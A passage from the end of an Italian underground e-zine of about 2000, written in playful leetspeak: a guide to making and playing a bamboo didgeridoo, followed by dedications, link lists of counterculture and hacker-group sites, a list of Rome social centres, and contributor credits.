non ci sono neanke le termiti...kuindi rimmediatevi :

-[ Una canna di bamb di grande diametro  e abbasatnza lunga...tipo  
   1.60 m..+ lunga  e meglio !
-[ Un kualkosa di molto lungo ke buki.
-[ Lima o carta vetrata.

oPzIonAle :

-[ Kualkosa per kolorare e/o incidere.

E' semplicissimo a dirlo..un p meno a farlo. Togliete tutti kuei kosi
ke dividono dentro le singole parti della canna. 

+-----------&----------------------&------------------&--------------+
|-----------&----------------------&------------------&--------------|
|-----------&----------------------&------------------&--------------|
+-----------&----------------------&------------------&--------------+
                                 ^
-]Kanna di Bamb vista da fuori _|     


                              OOOO 
                            OkosinoO
                           O###da###O
                           OsfondareO
                            O######O
                              OOOO
                
                                ^
-] Vista canna di Bamb         |
   dalla parte del buco ________|

Speriamo mi abbiate capito....

Dopo aver tolto kuei kosini in modo molto accurato.... levigate kon la lima o
scartavetrate kon la carta vetrata l'estremit della canna ( la parte +
pikkola in kui soffierete ) e dategli una forma tondeggiante di modo ke kuando
suonate non vi si sfondino le labbra .

Abbellite la canna a vostro piacimento se vi v e date sfogo alla vostra
pazzia mistika :P

-[ Kome si suona?

Mbh..io vi posso giusto dire kome si mettono le labbra sulla kanna e kome
soffiare...poi le sonorit le dovrete inventare voi...

Per suonare dovrete mettere met labbro superiore e met labbro inferiore sul
lato della canna e soffiare facendo una prrrprrrrrrprrrrrr!!! tipo
pernakkia....tutto st nell'esercitarsi!!!

===] UPGRADE [===

-oi!-oi!-oi!-oi!-oi!-oi!-oi!] Did Plus [-oi!-oi!-oi!-oi!-oi!-oi!-oi!-

Castel Candida Ceppa 23/o6/2ooo ----> okkei c'avevo l'orologio al     
                                      kontrario...beneeeeeeeeee!!
 

Dedicato a: gouranga ->( hi bRoTh!!! )
            Jammina  ->( :******************************************* ) 
            Yoghi ---->( Finalmente ci siamo sentiti!!!anke se kon la  
                         musika sotto non ci si kapiva nulla! :P :* ) 
            Michell9-->( Oi!Oi! :** )
            Elisa ---->( :********* )
            Elsa288 -->( Hai una bellissima voceeeeeee! pekkato ke non 
                         t'ho detto nulla.... :* )
            lili1 ---->( :* ciauz!! )
            NICKYE --->( :********************** )
            valv0 ---->( yA muSt Not bE s0 bUsY! :** )
            DanteAlig->( : )
            N0b0 ----->( Skin&Punk N0b0!!!Oi!Oi! )
            smav`----->( `a mejo :* )
            Dalila --->(|_o)
            mAyhEm --->( troppo bello vestito kome l'angioletti :)

Non ho un kazzo da fare...sono le 22.1o...aspetto una telefonata kuindi faccio
un upgrade dell'artikolo su kome fare un didgeridu in casa o meglio sul kome
suonare un did fatto in casa.

Per avere un bel suono un did deve essere pulito bene dentro innanzi tutto,
il ke signifika sfondare kon un tondino di ferro le membrane interne della
canna di bamb.

Se volete potete komprare della c'era d'ape pura al 1oo% ( odora di miele ).
Immergete il barattolo di c'era d'ape in un pentolino kon dell'ackua kalda e
la fate sciogliere...ci immergete kos l'estremit del did e girate
lentamente...prima ke si raffreddi la modellate kon le dita per farle
akuistare una superfice liscia. In kuesto modo le labbra si gonfieranno un p
di meno kuando suonate lo strumento( soffrirete di meno :).

Io il primo suono kol did l'ho fatto davanti alla tivv mentre oziavo ...
guardando un film d'Alberto Sordi...non pensavo proprio a suonarlo, penso ke
all'inizio dovreste kominciare a non pensare sul kome far uscire il suono.

Ku ci servirebbero gli ASCii decenti per far capire la posizione...ma  kuasi
impossibile capirlo tramite caratteri ASCii!!!!

Ve lo spiego a parole.

Mettete il did davanti alle vostre labbra e poggiatele leggeremente sul buko
del did. La testa deve essere un pokino inclinata ( o dx o sx, dipende da
kome vi sentite komodi ),poik sul did dovrete poggiare met labbra.

Ora kominciate a spernakkiare l dentro...il suono lo dovete dare voi
modulando la bokka, l'importante  ke mentre spernakkiate fate un suono tipo
uuuuuuuhhhhhuhhhuuuuuuuuuhhuhhhhhuuhuhhh oppure rrrrroooorrrroo-
oooorooooooooroooooorrooooo...vabb ci siamo cabiti...dovete trovare suoni
molto tribali...molto tribali non tipo Pantera [ Smerdera ] o l'altri 
koyoni...
kome si kiamano? Friggitura? Smerdatura? ah s...Sepultura 
[ o Sepoltura ?!? ].

:P Oi! Oi! Oi! Siam Fieri Di Essere Oi! Rasato e Fiero! Oi!

Okkei okkei...ki s' letto tutto l'art fino a ku  un grande ;*
Ki c'ha capito kualkosa  ankora mejo. :0 

Konsiglio a tutti di leggere l'art di mR_bIs0n sulle segreterie.
Un bel lavoro. :) ( sez. Phreaking )

Volevo precisare ke "La sagra del Prepuzio fritto"  e  La "Fiera degli
spazzolini da denti" di kui parlava mR_bIs0n si terr a Santa Maria Giovanna
( protettrice dei drogati e iellatrice della pula ) in provincia di Venezia il
15/o8/1943 .

Spamming del giorno.(in kualke modo li dovremo vendere st cidd no?!?)

A tutti gli amanti della vera musika  in vendita il cidd degli Atra
a sole 5 karte + spese di spedizione ( circa  25oo ) !!!
Suvvia non fate i rabbini e mailate per maggiori info a atra@freemail.it ! :)

  il mattino ha l'oro in bokka            Lo zio`sP3nK controlla.
                                             mhehihi!ciao ciao


Mailate per kualsiasi kosa a : sp3nky@freemail.it
                       
---zio`sP3nKy---

    ###################
   ###              ###
  ###  -[ 0UtR0 ]- ### 
 ###              ###
 ###################

------------------------------------------------------------------[ lInKs ]---
===] HOTWEB ]=================================================================
-----[ ]CyBOrG[ ]-------------------------------------------------------------

..........
HaCkTiViSm

Alcei -ITA-
http://www.alcei.it/

Xs4All
http://www.xs4all.net/

Hacker News Network
http://www.hackernews.com/

.......
DiSiNfO

Kontro Kultura -ITA-
http://www.geocities.com/kontrokultura/

Mondo Underground Webzine -ITA-
http://www.geocities.com/SoHo/Cafe/8541/

Disinfo
http://www.disinfo.com/

Tactical Media Crew -ITA-
http://www.tmcrew.org

Zeus News -ITA-
http://www.zeusnews.com/

Punto informatico -ITA-
http://www.punto-informatico.it/

..............
CoMuNiC-aZiOnE

SocialMedia -ITA-
http://ospiti.ingredium.it/socialmedia/

Net Institute -ITA-
http://net-i.zkm.de/

Noam Chomsky Archive -ITA-
http://pages.hotbot.com/edu/chomsky.it/index.html

MediaMente -ITA-
http://www.mediamente.rai.it

Golem -ITA-
http://www.grr.rai.it/golem/

Radio Cybernet -ITA-
http://www.kyuzz.org/radiocybernet/

.Zip -ITA-
http://www.ecn.org/zip/

Strano Network -ITA-
http://strano.net/

Luther Blissett -ITA-
http://www.lutherblissett.net/

.........
CyBeRpUnK

Neural -ITA-
http://www.neural.it/

Settore Cyberpunk -ITA-
http://www.ecn.org/settorecyb/

.....
CrImE

Criminology -ITA-
http://jump.to/marcocal

...........
UnDeRgRoUnD

PeaceLink -ITA-
http://www.peacelink.it/

Sherwood -ITA-
http://www.sherwood.it/

Contropiani -ITA-
http://www.contropiani2000.org/

Adbusters
http://www.adbusters.org/

Anarcociclismo -ITA-
http://www.kyuzz.org/anarcociclismo/

European Counter Network -ITA-
http://www.ecn.org

.........
CyBeR-aRt

Masters -ITA-
http://masters.imd.it/

0100101110101101
http://www.0100101110101101.org/

.....
SpAcE

Associazione Astronauti Autonomi -ITA-
http://www.geocities.com/CapeCanaveral/Launchpad/3066/

Men In Red -ITA-
http://www.kyuzz.org/mir/

........
CyBeRlAw

Interlex -ITA-
http://www.interlex.it/

Andrea Monti -ITA-
http://www.andreamonti.org/

.......
PrYvAcY

I CTRL U -ITA-
http://members.xoom.it/IctrlU/

Infotec -ITA-
http://www.gardaweb.it/

..........
AnTi-CleRo

Bambini di Satana -ITA-
http://www.bambinidisatana.it

BeatoPio
http://www.anticlero.com

.................
MoToRi-Di-RiCeRcA

HotBot
http://www.hotbot.com

.................
MoToRi-Di-RiCeRcA

Altavista
http://www.altavista.com/

AltraVista -ITA-
http://www.ecn.org/altravista/

AntiOnline
http://www.antionline.com/

AstaLaVista
http://astalavista.box.sk/

Avatar Search
http://www.avatarsearch.com/

NewOrder
http://neworder.box.sk/


------------------------------------------------------------------[ lInKs ]---
===] -ROMA- LISTA CENTRI SOCIALI (CS/CSA/CSOA/CSIOA) ]========================
-----[ sP3nKy ]---------------------------------------------------------------

Lab 00128 ---> http://www.tmcrew.org/csa/lab00128/index.htm 
              Via Caduti della Liberazione 268 ( Spinaceto )   
              Tel. o6-5o88565 
Blitz -------> Via Meuccio Ruini 45 
Brancaleone -> branka@pronet.it
               via Levanna 11
               Tel. o6-82ooo959 oppure o6-82ooo851 
Break Out ---> Via Dibbiena 3 ( Primavalle ) 
"La Talpa" --> http://www.tmcrew.org/csa/cbernocc/cbstory.htm>
               Via Guido Brogi 21 ( Casal Bernocchi ) 
Casale Podere Rosa --> Via Fabbri Tel. o6-8271545 
Corto Circuito  -----> cortocircuito@mail.pelagus.it>
                       Via Serafini 57 (Lamaro) Tel. o6-7217628 
EL CHEntrosociale Torbellamonaca --> Largo Mengaroni 11 
                                     ( Tor Bella Monaca ) 
Er Garage --> Via Tranfo (San Basilio) 
Ex Casa del Popolo --> Via di Valle Aurelia 37 ( Valle Aurelia )
Ex Snia Viscosa   ---> http://www.tmcrew.org/arte/manifest.htm  
                       Via Prenestina 173 
Il Garage -----------> Via Gustavo Modena 92 ( Trastevere ) 
Hai Visto Quinto? ---> Via Val Pellice 4 (Montesacro) Tel. o6-862o5262 
Interzona -----------> Via Valle Aurelia 37 
Intifada ------------> Via di Casalbruciato 15 Tel. o6-4358785o
Ip -V-e-n-i-t-e-c-i-> Via del Giardino Vecchio Marino (KastelliRomani)
Laurentinokkupato ---> www.tmcrew.org/laurentinokkupato/index.htm 
                       Via Giuliotti 8 ( 6 ponte ) 
Macchia Rossa -------> Via Pieve Fosciana 82 ( Majana ) 
La Maggiolina  ------> Via Bencivenga  Tel. o6-862o7352 
Obelix --------------> Via val Melaina 4 
Pirateria -----------> Circonvallazione Ostiense 9 ( Mercati Generali ) 
Ricomincio dal Faro -> Via Trullo 330 ( Trullo ) 
Spaziokamino --------> http://www.tmcrew.org/csa/spzk/index.htm> 
                       Via Calenzana 7 ( Ostia ) 
La Strada  ----------> http://www.ecn.org/la.strada/ 
                       Via Passino 24 ( Garbatella ) Tel. o6-5133659 
La Torre ------------> mmariuz@tin.it via Bertero ( Casal Dei Pazzi )      
                       Tel. o6-8822869 
La Strada -----------> http://www.ecn.org/la.strada/ 
                       Via Passino 24 ( Garbatella )  Tel. o6-5133659 
Via dei Volsci ------> http://www.tmcrew.org/csa/viadeivolsci/index.htm    
                       Quartiere san Lorenzo
Vittorio Occupato ---> http://www.tmcrew.org/csa/vittorio/vittor.htm Lungomare
                       Toscanelli 184---> ( Ostia Lido )
Zona A Rischio ------> http://www.tmcrew.org/zonarischio/index.htm 
                       Via De Dominicis 4 ( Casalbertone )    
                       Tel.o6-4393271 
Forte Prenestino  ---> http://www.ecn.org/forte/ forte@ecn.org
                       Via Federico Delpino ( 1oo celle )  
                       Tel/Fax. o6-218o7855

------------------------------------------------------------------[ lInKs ]---
===] LINKS ]==================================================================
-----[ LVOA Area61 Produzioni Clandestine ]-----------------------------------


+---------------------------------------------------------------------+
| Link a siti alternativi                                             |
+--------+------------------------------------------------------------+
| Antisocial           | http://antisocial.tsx.org/                   |
| Ringzero             | http://ringzer0.cjb.net/                     |
| Attila Hack          | http://attilahack.cjb.net/                   |
| Wannabe E-Zine       | http://wannabe00.cjb.net/                    |
| Bypass               | http://bypass.pcupdate.easyspace.com/        |
| Cavallo de Cavallis  | http://fly.to/cavallo/                       |
| Cyb0rG               | http://alternativex.cjb.net/                 |
| Drac                 | http://come.to/dracitalia/                   |
| Techno Knight        | http://members.xoom.it/TechnoKnight/         |
| Kalidor              | http://kalidor.tsx.org/                      |
| Lopks                | http://come.to/lopks                         |
| Lord Guf             | http://guf.cjb.net/                          |
| Lupin                | http://www.lupin3rd.org/                     |
| MrZero               | http://www2.sienanet.it/users/MrZeRo/        |
| Softproject          | http://www.s0ftpj.org/                       |
| Ozone                | http://zap.to/ozone/                         |
| MasterG              | http://web.tiscalinet.it/masterpage/         |
| Sector               |                                              |
|                   http://www.angelfire.com/on/sectoronex/index.html |
| Spaghetti Phreakers  | http://www.spaghettiphreakers.softitaly.com  |
| Anlongex             | http://www.mesa-sys.com/~along3x/welcome.htm |
| Under Construction   | http://underconstruction.webjump.com/        |
| Valvoline Crew       | http://valvoline.cjb.net/                    |
| Spippolatori         | http://www.spippolatori.com                  |
| BobbyMetal           | http://members.theglobe.com/Bobbymetal/      |
| Bonu$                | http://wurstel.ing.unibs.it/~bonus/          |
| Assassinz            |                                              |
|                 http://www.fortunecity.com/skyscraper/database/483/ |
| Pgreko               | http://pgreko.tsx.org/                       |
| Dislessici           | http://www.dislessici.org                    |
| Spiritoz             | http://spiritoz.cjb.net/                     |
| YanOrel              | http://come.to/YanOrel                       |
| Terminal.c           | http://www.ecn.org/loa/terminal/             |
| UIC & Quequero       | http://www.uic-spippolatori.com              |
+----------------------+----------------------------------------------+
| ECN                  | http://www.ecn.org                           |
| TMCrew               | http://www.tmcrew.org                        | 
| Sherwood             | http://www.sherwood.it/                      |
| Kyuzz                | http://www.kyuzz.org                         |
| Strano Network       | http://strano.net                            |
| Voyanet              | http://www.voyanet.org                       |
| Peacelink            | http://www.peacelink.it                      |
| Metro Olografix      | http://www.olografix.com                     |
+----------------------+----------------------------------------------+
| Punto Informatico    | http://www.punto-informatico.it/             |
| Apogeo On Line       | http://www.apogeonline.com                   |
+----------------------+----------------------------------------------+
| Hacklab Firenze      | http://firenze.hacklab.org/                  |
| AVANA                |                                              |
|                  http://www.ecn.org/forte/laboratori/avanahome.html |
| Politecnico Torino   | http://www.poli.studenti.to.it/              |
+----------------------+----------------------------------------------+
| Radio Cybernet       | http://www.kyuzz.org/radiocybernet/          |
| Golem                | http://www.grr.rai.it/golem                  |
+----------------------+----------------------------------------------+
| Neural               | http://www.pandora.it/neural                 |
| Decoder              | http://www.decoder.it -                      |
|                      | http://www4.iol.it/decoder                   |
| Infoxoa              | http://www.tmcrew.org/lab00128/index         |
+----------------------+----------------------------------------------+
| Linux                | http://www.linux.it                          |
| Manuali              | http://www.manuali.net                       |
+----------------------+----------------------------------------------+
| Gnu                  | http://www.gnu.org                           |
+----------------------+----------------------------------------------+
| Etoy                 | http://www.etoy.com                          |
| Netomat              | http://www.netomat.net                       |
+----------------------+----------------------------------------------+
| CAQ                  | http://www.caq.com                           |
| Wired                | http://www.wired.com                         |
+----------------------+----------------------------------------------+
http://www.twilight-cd.com
http://www.kevinmitnick.com
http://www.rtmark.com
http://www.2600.com
-
------------------------------------------------------------------[ oUtr0 ]---
===] OUTRO AIS#3 ]============================================================
-----[ LVOA AreA61 pR0duZiOnI cLanDeStiNe ]-----------------------------------

Non mi resta altro che salutarvi, questo numero 3 e' finito....ora AiS si
riposa, il numero4 non uscira' prima di meta'/fine settembre, ma cmq ci
sara' a breve lo speciale "on the beach"...
-[ Anarchy In the Summer ]-

Ciao a tutti e...

...cHe lA fOrzA sIa kOn tE!!!...

by OldirOn61 wEbMaSter of:
                 ____  ____  ____  ____  ____  _
              _ |___ \| __ \/ __ \|___ \/  __|| | _
             (_)/ __ ||    /| ___// __ || __ \| |(_)
                \____/|_|\_\\____|\____/\____/|_|
-| LaBoRatOriO VirtuAle OkkUpAto & AuToGesTiTo Area61:ZonA FranKa|-

-| http://www.area61.cjb.net |- (http://area61.bbk.org coming soon)
-| area61@iname.com |-
-| azzurraNET(Chat.jodler.net) #area61 |-
-| news.shy.datawell.it  alt.lvoa.area61 |-
-| http://Area61.egroups.com |-


x L' e-ZiNe                  _
                       ____ (_) ____
                    _ |___ \| |/ ___| _
                   (_)/ __ || |\___ \(_)
                      \____/|_||____/
                 -|AnArCHy iN tHe SySTeM|- 
                 ^^-|uNiVeRsAl  E_ZiNe|-^^
                           
-| http://aisprod.cjb.net |-
-| http://aisprod.tsx.org |- [rEdiReCt #1]
-| aisprod@freemail.it |-
-| ircNET(irc.flashnet.it) #aisprod |-
-| http://aisprodML.listbot.com |-


WeBmAsTEr: OldirOn61 
ASCII by:  cYb0rG-OldirOn61

HaNNo SkrIttO pEr qUesTO nUmErO: (In ordine rigorosamente sparso)
			
-mR_bIs0n    -(aduggento@net-service.net)
-The Raven   -(the_raven@libero.it)
-Kalidor     -(kalidor@tin.it)
-sP3nky      -(sp3nky@freemail.it)
-OldirOn61   -(oldiron61@iname.com)
-]CyBOrG[    -(cyborg@freemail.it)
-Golem       -(g0lem@SoftHome.com)
-QueQuero    -(UIC@mail.usa.com)           
-X_Ted         NOT AVAILABLE
-Away        -(away@subdimension.com)
-Falcon      -(falcon@thenavy.com)
-Maggiorana  -(maggiorana@tiscalinet.it)
-WhITeFiRE   -(fausu@libero.it)
-Orka4n      -(orka4n@yahoo.it)
-The Jackal  -(-jackal-@libero.it)
-Dmaster     -(dmaster@infinito.it)
-/zOKA/      -(inkazzato_@hotmail.com)
-Davser      -(davser@tin.it)
-adr3        -(acidjm@yahoo.it)
-Vulcan      -(vulcan12mm@hotmail.com)
-ZETA          NOT AVAILABLE
-Sash4       -(sash4@inwind.it)
-R A M S E S -(ram5e5@freemail.it)
-H4mBuck3r   -(Hambucker@myself.com)      
-ValK        -(valkzone@infinito.it)                                         

		
